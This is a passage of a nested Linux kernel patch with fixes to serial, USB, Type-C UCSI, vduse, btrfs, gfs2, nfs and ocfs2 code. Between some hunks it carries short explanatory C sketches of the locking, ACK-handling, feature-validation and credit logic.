++		unsigned char efr2, timeout_h, timeout_l;
++
++		efr2 = serial_in(up, UART_OMAP_EFR2);
++		timeout_h = serial_in(up, UART_OMAP_TO_H);
++		timeout_l = serial_in(up, UART_OMAP_TO_L);
++		serial_out(up, UART_OMAP_TO_H, 0xFF);
++		serial_out(up, UART_OMAP_TO_L, 0xFF);
++		serial_out(up, UART_OMAP_EFR2, UART_OMAP_EFR2_TIMEOUT_BEHAVE);
++		serial_in(up, UART_IIR);
++		serial_out(up, UART_OMAP_EFR2, efr2);
++		serial_out(up, UART_OMAP_TO_H, timeout_h);
++		serial_out(up, UART_OMAP_TO_L, timeout_l);
+ 	}
+ 
+ 	/* Stop processing interrupts on input overrun */
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index b20abaa9ef150..40e59e72d5e9e 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -120,6 +120,7 @@
+ #define UCR4_OREN	(1<<1)	/* Receiver overrun interrupt enable */
+ #define UCR4_DREN	(1<<0)	/* Recv data ready interrupt enable */
+ #define UFCR_RXTL_SHF	0	/* Receiver trigger level shift */
++#define UFCR_RXTL_MASK	0x3F	/* Receiver trigger 6 bits wide */
+ #define UFCR_DCEDTE	(1<<6)	/* DCE/DTE mode select */
+ #define UFCR_RFDIV	(7<<7)	/* Reference freq divider mask */
+ #define UFCR_RFDIV_REG(x)	(((x) < 7 ? 6 - (x) : 6) << 7)
+@@ -1959,7 +1960,7 @@ static int imx_uart_rs485_config(struct uart_port *port, struct ktermios *termio
+ 				 struct serial_rs485 *rs485conf)
+ {
+ 	struct imx_port *sport = (struct imx_port *)port;
+-	u32 ucr2;
++	u32 ucr2, ufcr;
+ 
+ 	if (rs485conf->flags & SER_RS485_ENABLED) {
+ 		/* Enable receiver if low-active RTS signal is requested */
+@@ -1978,8 +1979,13 @@ static int imx_uart_rs485_config(struct uart_port *port, struct ktermios *termio
+ 
+ 	/* Make sure Rx is enabled in case Tx is active with Rx disabled */
+ 	if (!(rs485conf->flags & SER_RS485_ENABLED) ||
+-	    rs485conf->flags & SER_RS485_RX_DURING_TX)
++	    rs485conf->flags & SER_RS485_RX_DURING_TX) {
++		/* If the receiver trigger is 0, set it to a default value */
++		ufcr = imx_uart_readl(sport, UFCR);
++		if ((ufcr & UFCR_RXTL_MASK) == 0)
++			imx_uart_setup_ufcr(sport, TXTL_DEFAULT, RXTL_DEFAULT);
+ 		imx_uart_start_rx(port);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/tty/serial/mcf.c b/drivers/tty/serial/mcf.c
+index b1cd9a76dd93b..1374b4e82d75f 100644
+--- a/drivers/tty/serial/mcf.c
++++ b/drivers/tty/serial/mcf.c
+@@ -480,7 +480,7 @@ static const struct uart_ops mcf_uart_ops = {
+ 	.verify_port	= mcf_verify_port,
+ };
+ 
+-static struct mcf_uart mcf_ports[4];
++static struct mcf_uart mcf_ports[10];
+ 
+ #define	MCF_MAXPORTS	ARRAY_SIZE(mcf_ports)
+ 
+diff --git a/drivers/usb/atm/cxacru.c b/drivers/usb/atm/cxacru.c
+index 4ce7cba2b48aa..8f3b9a0a38e1d 100644
+--- a/drivers/usb/atm/cxacru.c
++++ b/drivers/usb/atm/cxacru.c
+@@ -1131,6 +1131,7 @@ static int cxacru_bind(struct usbatm_data *usbatm_instance,
+ 	struct cxacru_data *instance;
+ 	struct usb_device *usb_dev = interface_to_usbdev(intf);
+ 	struct usb_host_endpoint *cmd_ep = usb_dev->ep_in[CXACRU_EP_CMD];
++	struct usb_endpoint_descriptor *in, *out;
+ 	int ret;
+ 
+ 	/* instance init */
+@@ -1177,6 +1178,19 @@ static int cxacru_bind(struct usbatm_data *usbatm_instance,
+ 		goto fail;
+ 	}
+ 
++	if (usb_endpoint_xfer_int(&cmd_ep->desc))
++		ret = usb_find_common_endpoints(intf->cur_altsetting,
++						NULL, NULL, &in, &out);
++	else
++		ret = usb_find_common_endpoints(intf->cur_altsetting,
++						&in, &out, NULL, NULL);
++
++	if (ret) {
++		usb_err(usbatm_instance, "cxacru_bind: interface has incorrect endpoints\n");
++		ret = -ENODEV;
++		goto fail;
++	}
++
+ 	if ((cmd_ep->desc.bmAttributes & USB_ENDPOINT_XFERTYPE_MASK)
+ 			== USB_ENDPOINT_XFER_INT) {
+ 		usb_fill_int_urb(instance->rcv_urb,
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 3b5482621e5e0..94bc7786a3c4e 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -2087,7 +2087,6 @@ static int dwc3_core_init_for_resume(struct dwc3 *dwc)
+ 
+ static int dwc3_suspend_common(struct dwc3 *dwc, pm_message_t msg)
+ {
+-	unsigned long	flags;
+ 	u32 reg;
+ 
+ 	switch (dwc->current_dr_role) {
+@@ -2125,9 +2124,7 @@ static int dwc3_suspend_common(struct dwc3 *dwc, pm_message_t msg)
+ 			break;
+ 
+ 		if (dwc->current_otg_role == DWC3_OTG_ROLE_DEVICE) {
+-			spin_lock_irqsave(&dwc->lock, flags);
+ 			dwc3_gadget_suspend(dwc);
+-			spin_unlock_irqrestore(&dwc->lock, flags);
+ 			synchronize_irq(dwc->irq_gadget);
+ 		}
+ 
+@@ -2144,7 +2141,6 @@ static int dwc3_suspend_common(struct dwc3 *dwc, pm_message_t msg)
+ 
+ static int dwc3_resume_common(struct dwc3 *dwc, pm_message_t msg)
+ {
+-	unsigned long	flags;
+ 	int		ret;
+ 	u32		reg;
+ 
+@@ -2193,9 +2189,7 @@ static int dwc3_resume_common(struct dwc3 *dwc, pm_message_t msg)
+ 		if (dwc->current_otg_role == DWC3_OTG_ROLE_HOST) {
+ 			dwc3_otg_host_init(dwc);
+ 		} else if (dwc->current_otg_role == DWC3_OTG_ROLE_DEVICE) {
+-			spin_lock_irqsave(&dwc->lock, flags);
+ 			dwc3_gadget_resume(dwc);
+-			spin_unlock_irqrestore(&dwc->lock, flags);
+ 		}
+ 
+ 		break;
+diff --git a/drivers/usb/gadget/function/f_printer.c b/drivers/usb/gadget/function/f_printer.c
+index 8545656419c71..65378266fd84e 100644
+--- a/drivers/usb/gadget/function/f_printer.c
++++ b/drivers/usb/gadget/function/f_printer.c
+@@ -210,6 +210,7 @@ static inline struct usb_endpoint_descriptor *ep_desc(struct usb_gadget *gadget,
+ 					struct usb_endpoint_descriptor *ss)
+ {
+ 	switch (gadget->speed) {
++	case USB_SPEED_SUPER_PLUS:
+ 	case USB_SPEED_SUPER:
+ 		return ss;
+ 	case USB_SPEED_HIGH:
+@@ -447,11 +448,8 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 	mutex_lock(&dev->lock_printer_io);
+ 	spin_lock_irqsave(&dev->lock, flags);
+ 
+-	if (dev->interface < 0) {
+-		spin_unlock_irqrestore(&dev->lock, flags);
+-		mutex_unlock(&dev->lock_printer_io);
+-		return -ENODEV;
+-	}
++	if (dev->interface < 0)
++		goto out_disabled;
+ 
+ 	/* We will use this flag later to check if a printer reset happened
+ 	 * after we turn interrupts back on.
+@@ -459,6 +457,9 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 	dev->reset_printer = 0;
+ 
+ 	setup_rx_reqs(dev);
++	/* this dropped the lock - need to retest */
++	if (dev->interface < 0)
++		goto out_disabled;
+ 
+ 	bytes_copied = 0;
+ 	current_rx_req = dev->current_rx_req;
+@@ -492,6 +493,8 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 		wait_event_interruptible(dev->rx_wait,
+ 				(likely(!list_empty(&dev->rx_buffers))));
+ 		spin_lock_irqsave(&dev->lock, flags);
++		if (dev->interface < 0)
++			goto out_disabled;
+ 	}
+ 
+ 	/* We have data to return then copy it to the caller's buffer.*/
+@@ -535,6 +538,9 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 			return -EAGAIN;
+ 		}
+ 
++		if (dev->interface < 0)
++			goto out_disabled;
++
+ 		/* If we are not returning all the data left in this RX request
+ 		 * buffer then adjust the amount of data left in the buffer.
+ 		 * Otherwise if we are done with this RX request buffer then
+@@ -564,6 +570,11 @@ printer_read(struct file *fd, char __user *buf, size_t len, loff_t *ptr)
+ 		return bytes_copied;
+ 	else
+ 		return -EAGAIN;
++
++out_disabled:
++	spin_unlock_irqrestore(&dev->lock, flags);
++	mutex_unlock(&dev->lock_printer_io);
++	return -ENODEV;
+ }
+ 
+ static ssize_t
+@@ -584,11 +595,8 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 	mutex_lock(&dev->lock_printer_io);
+ 	spin_lock_irqsave(&dev->lock, flags);
+ 
+-	if (dev->interface < 0) {
+-		spin_unlock_irqrestore(&dev->lock, flags);
+-		mutex_unlock(&dev->lock_printer_io);
+-		return -ENODEV;
+-	}
++	if (dev->interface < 0)
++		goto out_disabled;
+ 
+ 	/* Check if a printer reset happens while we have interrupts on */
+ 	dev->reset_printer = 0;
+@@ -611,6 +619,8 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 		wait_event_interruptible(dev->tx_wait,
+ 				(likely(!list_empty(&dev->tx_reqs))));
+ 		spin_lock_irqsave(&dev->lock, flags);
++		if (dev->interface < 0)
++			goto out_disabled;
+ 	}
+ 
+ 	while (likely(!list_empty(&dev->tx_reqs)) && len) {
+@@ -660,6 +670,9 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 			return -EAGAIN;
+ 		}
+ 
++		if (dev->interface < 0)
++			goto out_disabled;
++
+ 		list_add(&req->list, &dev->tx_reqs_active);
+ 
+ 		/* here, we unlock, and only unlock, to avoid deadlock. */
+@@ -672,6 +685,8 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 			mutex_unlock(&dev->lock_printer_io);
+ 			return -EAGAIN;
+ 		}
++		if (dev->interface < 0)
++			goto out_disabled;
+ 	}
+ 
+ 	spin_unlock_irqrestore(&dev->lock, flags);
+@@ -683,6 +698,11 @@ printer_write(struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
+ 		return bytes_copied;
+ 	else
+ 		return -EAGAIN;
++
++out_disabled:
++	spin_unlock_irqrestore(&dev->lock, flags);
++	mutex_unlock(&dev->lock_printer_io);
++	return -ENODEV;
+ }
+ 
+ static int
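
The f_printer hunks replace several inline unlock-and-return blocks with a single out_disabled exit, and re-test dev->interface at every point where the lock may have been dropped. A small pthread-based sketch of that drop-and-recheck discipline; all names here are illustrative, not the gadget API:

#include <errno.h>
#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static int interface;	/* >= 0: bound, -1: disconnected */

/* Funnel every "interface went away" failure through one
 * unlock-and-return exit, and re-test the condition after any
 * window in which the lock was dropped. */
static int do_io(void)
{
	pthread_mutex_lock(&lock);
	if (interface < 0)
		goto out_disabled;

	/* ... submit requests; helpers may drop the lock ... */
	pthread_mutex_unlock(&lock);
	/* another thread may disconnect the interface here */
	pthread_mutex_lock(&lock);

	if (interface < 0)	/* state may have changed: re-test */
		goto out_disabled;

	pthread_mutex_unlock(&lock);
	return 0;

out_disabled:
	pthread_mutex_unlock(&lock);
	return -ENODEV;
}

int main(void)
{
	printf("bound: do_io() = %d\n", do_io());
	interface = -1;
	printf("gone:  do_io() = %d\n", do_io());
	return 0;
}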
+diff --git a/drivers/usb/gadget/udc/aspeed_udc.c b/drivers/usb/gadget/udc/aspeed_udc.c
+index 01968e2167f91..cedf17e38245d 100644
+--- a/drivers/usb/gadget/udc/aspeed_udc.c
++++ b/drivers/usb/gadget/udc/aspeed_udc.c
+@@ -66,8 +66,8 @@
+ #define USB_UPSTREAM_EN			BIT(0)
+ 
+ /* Main config reg */
+-#define UDC_CFG_SET_ADDR(x)		((x) & 0x3f)
+-#define UDC_CFG_ADDR_MASK		(0x3f)
++#define UDC_CFG_SET_ADDR(x)		((x) & UDC_CFG_ADDR_MASK)
++#define UDC_CFG_ADDR_MASK		GENMASK(6, 0)
+ 
+ /* Interrupt ctrl & status reg */
+ #define UDC_IRQ_EP_POOL_NAK		BIT(17)
+diff --git a/drivers/usb/musb/da8xx.c b/drivers/usb/musb/da8xx.c
+index a4e55b0c52cff..1aae581434647 100644
+--- a/drivers/usb/musb/da8xx.c
++++ b/drivers/usb/musb/da8xx.c
+@@ -553,7 +553,7 @@ static int da8xx_probe(struct platform_device *pdev)
+ 	ret = of_platform_populate(pdev->dev.of_node, NULL,
+ 				   da8xx_auxdata_lookup, &pdev->dev);
+ 	if (ret)
+-		return ret;
++		goto err_unregister_phy;
+ 
+ 	pinfo = da8xx_dev_info;
+ 	pinfo.parent = &pdev->dev;
+@@ -568,9 +568,13 @@ static int da8xx_probe(struct platform_device *pdev)
+ 	ret = PTR_ERR_OR_ZERO(glue->musb);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to register musb device: %d\n", ret);
+-		usb_phy_generic_unregister(glue->usb_phy);
++		goto err_unregister_phy;
+ 	}
+ 
++	return 0;
++
++err_unregister_phy:
++	usb_phy_generic_unregister(glue->usb_phy);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index a163218fdc749..1e4059521eb0a 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -36,22 +36,16 @@
+  */
+ #define UCSI_SWAP_TIMEOUT_MS	5000
+ 
+-static int ucsi_acknowledge_command(struct ucsi *ucsi)
++static int ucsi_acknowledge(struct ucsi *ucsi, bool conn_ack)
+ {
+ 	u64 ctrl;
+ 
+ 	ctrl = UCSI_ACK_CC_CI;
+ 	ctrl |= UCSI_ACK_COMMAND_COMPLETE;
+-
+-	return ucsi->ops->sync_write(ucsi, UCSI_CONTROL, &ctrl, sizeof(ctrl));
+-}
+-
+-static int ucsi_acknowledge_connector_change(struct ucsi *ucsi)
+-{
+-	u64 ctrl;
+-
+-	ctrl = UCSI_ACK_CC_CI;
+-	ctrl |= UCSI_ACK_CONNECTOR_CHANGE;
++	if (conn_ack) {
++		clear_bit(EVENT_PENDING, &ucsi->flags);
++		ctrl |= UCSI_ACK_CONNECTOR_CHANGE;
++	}
+ 
+ 	return ucsi->ops->sync_write(ucsi, UCSI_CONTROL, &ctrl, sizeof(ctrl));
+ }
+@@ -64,7 +58,7 @@ static int ucsi_read_error(struct ucsi *ucsi)
+ 	int ret;
+ 
+ 	/* Acknowledge the command that failed */
+-	ret = ucsi_acknowledge_command(ucsi);
++	ret = ucsi_acknowledge(ucsi, false);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -76,7 +70,7 @@ static int ucsi_read_error(struct ucsi *ucsi)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = ucsi_acknowledge_command(ucsi);
++	ret = ucsi_acknowledge(ucsi, false);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -139,28 +133,33 @@ static int ucsi_exec_command(struct ucsi *ucsi, u64 cmd)
+ 		return -EIO;
+ 
+ 	if (cci & UCSI_CCI_NOT_SUPPORTED) {
+-		if (ucsi_acknowledge_command(ucsi) < 0)
++		if (ucsi_acknowledge(ucsi, false) < 0)
+ 			dev_err(ucsi->dev,
+ 				"ACK of unsupported command failed\n");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+ 	if (cci & UCSI_CCI_ERROR) {
+-		if (cmd == UCSI_GET_ERROR_STATUS)
++		if (cmd == UCSI_GET_ERROR_STATUS) {
++			ret = ucsi_acknowledge(ucsi, false);
++			if (ret)
++				return ret;
++
+ 			return -EIO;
++		}
+ 		return ucsi_read_error(ucsi);
+ 	}
+ 
+ 	if (cmd == UCSI_CANCEL && cci & UCSI_CCI_CANCEL_COMPLETE) {
+-		ret = ucsi_acknowledge_command(ucsi);
++		ret = ucsi_acknowledge(ucsi, false);
+ 		return ret ? ret : -EBUSY;
+ 	}
+ 
+ 	return UCSI_CCI_LENGTH(cci);
+ }
+ 
+-int ucsi_send_command(struct ucsi *ucsi, u64 command,
+-		      void *data, size_t size)
++static int ucsi_send_command_common(struct ucsi *ucsi, u64 command,
++				    void *data, size_t size, bool conn_ack)
+ {
+ 	u8 length;
+ 	int ret;
+@@ -179,7 +178,7 @@ int ucsi_send_command(struct ucsi *ucsi, u64 command,
+ 			goto out;
+ 	}
+ 
+-	ret = ucsi_acknowledge_command(ucsi);
++	ret = ucsi_acknowledge(ucsi, conn_ack);
+ 	if (ret)
+ 		goto out;
+ 
+@@ -188,6 +187,12 @@ int ucsi_send_command(struct ucsi *ucsi, u64 command,
+ 	mutex_unlock(&ucsi->ppm_lock);
+ 	return ret;
+ }
++
++int ucsi_send_command(struct ucsi *ucsi, u64 command,
++		      void *data, size_t size)
++{
++	return ucsi_send_command_common(ucsi, command, data, size, false);
++}
+ EXPORT_SYMBOL_GPL(ucsi_send_command);
+ 
+ /* -------------------------------------------------------------------------- */
+@@ -785,7 +790,9 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 	mutex_lock(&con->lock);
+ 
+ 	command = UCSI_GET_CONNECTOR_STATUS | UCSI_CONNECTOR_NUMBER(con->num);
+-	ret = ucsi_send_command(ucsi, command, &con->status, sizeof(con->status));
++
++	ret = ucsi_send_command_common(ucsi, command, &con->status,
++				       sizeof(con->status), true);
+ 	if (ret < 0) {
+ 		dev_err(ucsi->dev, "%s: GET_CONNECTOR_STATUS failed (%d)\n",
+ 			__func__, ret);
+@@ -833,14 +840,6 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 	if (con->status.change & UCSI_CONSTAT_CAM_CHANGE)
+ 		ucsi_partner_task(con, ucsi_check_altmodes, 1, 0);
+ 
+-	mutex_lock(&ucsi->ppm_lock);
+-	clear_bit(EVENT_PENDING, &con->ucsi->flags);
+-	ret = ucsi_acknowledge_connector_change(ucsi);
+-	mutex_unlock(&ucsi->ppm_lock);
+-
+-	if (ret)
+-		dev_err(ucsi->dev, "%s: ACK failed (%d)", __func__, ret);
+-
+ out_unlock:
+ 	mutex_unlock(&con->lock);
+ }
+diff --git a/drivers/usb/typec/ucsi/ucsi_stm32g0.c b/drivers/usb/typec/ucsi/ucsi_stm32g0.c
+index 7b92f0c8de708..8c3b052f6208f 100644
+--- a/drivers/usb/typec/ucsi/ucsi_stm32g0.c
++++ b/drivers/usb/typec/ucsi/ucsi_stm32g0.c
+@@ -64,6 +64,7 @@ struct ucsi_stm32g0 {
+ 	struct completion complete;
+ 	struct device *dev;
+ 	unsigned long flags;
++#define ACK_PENDING	2
+ 	const char *fw_name;
+ 	struct ucsi *ucsi;
+ 	bool suspended;
+@@ -395,9 +396,13 @@ static int ucsi_stm32g0_sync_write(struct ucsi *ucsi, unsigned int offset, const
+ 				   size_t len)
+ {
+ 	struct ucsi_stm32g0 *g0 = ucsi_get_drvdata(ucsi);
++	bool ack = UCSI_COMMAND(*(u64 *)val) == UCSI_ACK_CC_CI;
+ 	int ret;
+ 
+-	set_bit(COMMAND_PENDING, &g0->flags);
++	if (ack)
++		set_bit(ACK_PENDING, &g0->flags);
++	else
++		set_bit(COMMAND_PENDING, &g0->flags);
+ 
+ 	ret = ucsi_stm32g0_async_write(ucsi, offset, val, len);
+ 	if (ret)
+@@ -405,9 +410,14 @@ static int ucsi_stm32g0_sync_write(struct ucsi *ucsi, unsigned int offset, const
+ 
+ 	if (!wait_for_completion_timeout(&g0->complete, msecs_to_jiffies(5000)))
+ 		ret = -ETIMEDOUT;
++	else
++		return 0;
+ 
+ out_clear_bit:
+-	clear_bit(COMMAND_PENDING, &g0->flags);
++	if (ack)
++		clear_bit(ACK_PENDING, &g0->flags);
++	else
++		clear_bit(COMMAND_PENDING, &g0->flags);
+ 
+ 	return ret;
+ }
+@@ -428,8 +438,9 @@ static irqreturn_t ucsi_stm32g0_irq_handler(int irq, void *data)
+ 	if (UCSI_CCI_CONNECTOR(cci))
+ 		ucsi_connector_change(g0->ucsi, UCSI_CCI_CONNECTOR(cci));
+ 
+-	if (test_bit(COMMAND_PENDING, &g0->flags) &&
+-	    cci & (UCSI_CCI_ACK_COMPLETE | UCSI_CCI_COMMAND_COMPLETE))
++	if (cci & UCSI_CCI_ACK_COMPLETE && test_and_clear_bit(ACK_PENDING, &g0->flags))
++		complete(&g0->complete);
++	if (cci & UCSI_CCI_COMMAND_COMPLETE && test_and_clear_bit(COMMAND_PENDING, &g0->flags))
+ 		complete(&g0->complete);
+ 
+ 	return IRQ_HANDLED;
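
The stm32g0 change gives ACK writes their own pending flag so that a command-complete event can no longer wake an ACK waiter (or the reverse). A compact model of the dispatch, with plain bit helpers standing in for the kernel's atomic test_and_clear_bit():

#include <stdbool.h>
#include <stdio.h>

#define CCI_ACK_COMPLETE	(1u << 0)
#define CCI_CMD_COMPLETE	(1u << 1)

#define ACK_PENDING	0
#define CMD_PENDING	1

static unsigned long flags;

static bool test_and_clear(unsigned long *f, int bit)
{
	bool was = *f & (1ul << bit);

	*f &= ~(1ul << bit);
	return was;
}

/* Only the waiter that actually posted the matching request is
 * completed, so an ACK completion cannot wake a command waiter. */
static void irq(unsigned int cci)
{
	if ((cci & CCI_ACK_COMPLETE) && test_and_clear(&flags, ACK_PENDING))
		printf("complete ACK waiter\n");
	if ((cci & CCI_CMD_COMPLETE) && test_and_clear(&flags, CMD_PENDING))
		printf("complete command waiter\n");
}

int main(void)
{
	flags |= 1ul << CMD_PENDING;
	irq(CCI_ACK_COMPLETE);	/* ignored: no ACK was pending */
	irq(CCI_CMD_COMPLETE);	/* wakes the command waiter */
	return 0;
}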
+diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
+index edcd74cc4c0f7..0ccece3f4f7da 100644
+--- a/drivers/vdpa/vdpa_user/vduse_dev.c
++++ b/drivers/vdpa/vdpa_user/vduse_dev.c
+@@ -8,6 +8,7 @@
+  *
+  */
+ 
++#include "linux/virtio_net.h"
+ #include <linux/init.h>
+ #include <linux/module.h>
+ #include <linux/cdev.h>
+@@ -28,6 +29,7 @@
+ #include <uapi/linux/virtio_config.h>
+ #include <uapi/linux/virtio_ids.h>
+ #include <uapi/linux/virtio_blk.h>
++#include <uapi/linux/virtio_ring.h>
+ #include <linux/mod_devicetable.h>
+ 
+ #include "iova_domain.h"
+@@ -1416,13 +1418,17 @@ static bool device_is_allowed(u32 device_id)
+ 	return false;
+ }
+ 
+-static bool features_is_valid(u64 features)
++static bool features_is_valid(struct vduse_dev_config *config)
+ {
+-	if (!(features & (1ULL << VIRTIO_F_ACCESS_PLATFORM)))
++	if (!(config->features & BIT_ULL(VIRTIO_F_ACCESS_PLATFORM)))
+ 		return false;
+ 
+ 	/* Now we only support read-only configuration space */
+-	if (features & (1ULL << VIRTIO_BLK_F_CONFIG_WCE))
++	if ((config->device_id == VIRTIO_ID_BLOCK) &&
++			(config->features & BIT_ULL(VIRTIO_BLK_F_CONFIG_WCE)))
++		return false;
++	else if ((config->device_id == VIRTIO_ID_NET) &&
++			(config->features & BIT_ULL(VIRTIO_NET_F_CTRL_VQ)))
+ 		return false;
+ 
+ 	return true;
+@@ -1449,7 +1455,7 @@ static bool vduse_validate_config(struct vduse_dev_config *config)
+ 	if (!device_is_allowed(config->device_id))
+ 		return false;
+ 
+-	if (!features_is_valid(config->features))
++	if (!features_is_valid(config))
+ 		return false;
+ 
+ 	return true;
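
features_is_valid() now rejects write-implying feature bits per device type instead of globally. A self-contained sketch of the same checks; the virtio constants below follow the uapi headers but should be treated as assumptions of this example:

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define BIT_ULL(n)	(1ULL << (n))

/* Values mirror the virtio spec; treat them as assumptions here. */
#define VIRTIO_ID_NET			1
#define VIRTIO_ID_BLOCK			2
#define VIRTIO_BLK_F_CONFIG_WCE		11
#define VIRTIO_NET_F_CTRL_VQ		17
#define VIRTIO_F_ACCESS_PLATFORM	33

struct dev_config {
	uint32_t device_id;
	uint64_t features;
};

/* Feature bits that imply a writable config space, or a control
 * virtqueue the userspace device cannot service, are rejected
 * per device type rather than for every device. */
static bool features_is_valid(const struct dev_config *c)
{
	if (!(c->features & BIT_ULL(VIRTIO_F_ACCESS_PLATFORM)))
		return false;
	if (c->device_id == VIRTIO_ID_BLOCK &&
	    (c->features & BIT_ULL(VIRTIO_BLK_F_CONFIG_WCE)))
		return false;
	if (c->device_id == VIRTIO_ID_NET &&
	    (c->features & BIT_ULL(VIRTIO_NET_F_CTRL_VQ)))
		return false;
	return true;
}

int main(void)
{
	struct dev_config blk = {
		.device_id = VIRTIO_ID_BLOCK,
		.features  = BIT_ULL(VIRTIO_F_ACCESS_PLATFORM) |
			     BIT_ULL(VIRTIO_BLK_F_CONFIG_WCE),
	};

	printf("blk valid: %d\n", features_is_valid(&blk));	/* 0 */
	return 0;
}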
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index b27795e13ff31..862a222caab33 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2676,7 +2676,7 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	u64 offset = bytenr - block_group->start;
+ 	u64 to_free, to_unusable;
+ 	int bg_reclaim_threshold = 0;
+-	bool initial = (size == block_group->length);
++	bool initial = ((size == block_group->length) && (block_group->alloc_offset == 0));
+ 	u64 reclaimable_unusable;
+ 
+ 	WARN_ON(!initial && offset + size > block_group->zone_capacity);
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 302d1e43d7012..6107cd680176c 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -591,6 +591,8 @@ static void gfs2_put_super(struct super_block *sb)
+ 
+ 	if (!sb_rdonly(sb)) {
+ 		gfs2_make_fs_ro(sdp);
++	} else {
++		gfs2_quota_cleanup(sdp);
+ 	}
+ 	WARN_ON(gfs2_withdrawing(sdp));
+ 
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index b555efca01d20..f16b13ba4204a 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -131,8 +131,6 @@ int nfs_swap_rw(struct kiocb *iocb, struct iov_iter *iter)
+ {
+ 	ssize_t ret;
+ 
+-	VM_BUG_ON(iov_iter_count(iter) != PAGE_SIZE);
+-
+ 	if (iov_iter_rw(iter) == READ)
+ 		ret = nfs_file_direct_read(iocb, iter, true);
+ 	else
+diff --git a/fs/ocfs2/aops.c b/fs/ocfs2/aops.c
+index 0394505fdce3f..e94a5a9fec012 100644
+--- a/fs/ocfs2/aops.c
++++ b/fs/ocfs2/aops.c
+@@ -2370,6 +2370,11 @@ static int ocfs2_dio_end_io_write(struct inode *inode,
+ 	}
+ 
+ 	list_for_each_entry(ue, &dwc->dw_zero_list, ue_node) {
++		ret = ocfs2_assure_trans_credits(handle, credits);
++		if (ret < 0) {
++			mlog_errno(ret);
++			break;
++		}
+ 		ret = ocfs2_mark_extent_written(inode, &et, handle,
+ 						ue->ue_cpos, 1,
+ 						ue->ue_phys,
+diff --git a/fs/ocfs2/journal.c b/fs/ocfs2/journal.c
+index 3fb98b4569a28..7d6843d78c84c 100644
+--- a/fs/ocfs2/journal.c
++++ b/fs/ocfs2/journal.c
+@@ -447,6 +447,23 @@ int ocfs2_extend_trans(handle_t *handle, int nblocks)
+ 	return status;
+ }
+ 
++/*
++ * Make sure handle has at least 'nblocks' credits available. If it does not
++ * have that many credits available, we will try to extend the handle to have
++ * enough credits. If that fails, we will restart the transaction to have enough
++ * credits. Similar notes regarding data consistency and locking implications
++ * as for ocfs2_extend_trans() apply here.
++ */
++int ocfs2_assure_trans_credits(handle_t *handle, int nblocks)
++{
++	int old_nblks = jbd2_handle_buffer_credits(handle);
++
++	trace_ocfs2_assure_trans_credits(old_nblks);
++	if (old_nblks >= nblocks)
++		return 0;
++	return ocfs2_extend_trans(handle, nblocks - old_nblks);
++}
++
+ /*
+  * If we have fewer than thresh credits, extend by OCFS2_MAX_TRANS_DATA.
+  * If that fails, restart the transaction & regain write access for the
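
ocfs2_assure_trans_credits() only extends a handle by the shortfall rather than requesting the full amount again. A toy model of that bookkeeping, with a trivial struct standing in for the jbd2 handle and an extend step that always succeeds:

#include <stdio.h>

/* Hypothetical stand-in for jbd2 handle bookkeeping. */
struct handle { int credits; };

static int extend_trans(struct handle *h, int nblocks)
{
	/* In the kernel this may fail and fall back to restarting
	 * the transaction; here it always succeeds. */
	h->credits += nblocks;
	return 0;
}

/* Ask only for the shortfall, never for the full amount again. */
static int assure_trans_credits(struct handle *h, int nblocks)
{
	if (h->credits >= nblocks)
		return 0;
	return extend_trans(h, nblocks - h->credits);
}

int main(void)
{
	struct handle h = { .credits = 3 };

	assure_trans_credits(&h, 8);	/* extends by 5, not 8 */
	printf("credits now %d\n", h.credits);
	return 0;
}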
+diff --git a/fs/ocfs2/journal.h b/fs/ocfs2/journal.h
+index 41c382f68529e..689c340c6363d 100644
+--- a/fs/ocfs2/journal.h
++++ b/fs/ocfs2/journal.h
+@@ -243,6 +243,8 @@ handle_t		    *ocfs2_start_trans(struct ocfs2_super *osb,
+ int			     ocfs2_commit_trans(struct ocfs2_super *osb,
+ 						handle_t *handle);
+ int			     ocfs2_extend_trans(handle_t *handle, int nblocks);
++int			     ocfs2_assure_trans_credits(handle_t *handle,
++						int nblocks);
+ int			     ocfs2_allocate_extend_trans(handle_t *handle,
+ 						int thresh);
+ 
+diff --git a/fs/ocfs2/ocfs2_trace.h b/fs/ocfs2/ocfs2_trace.h
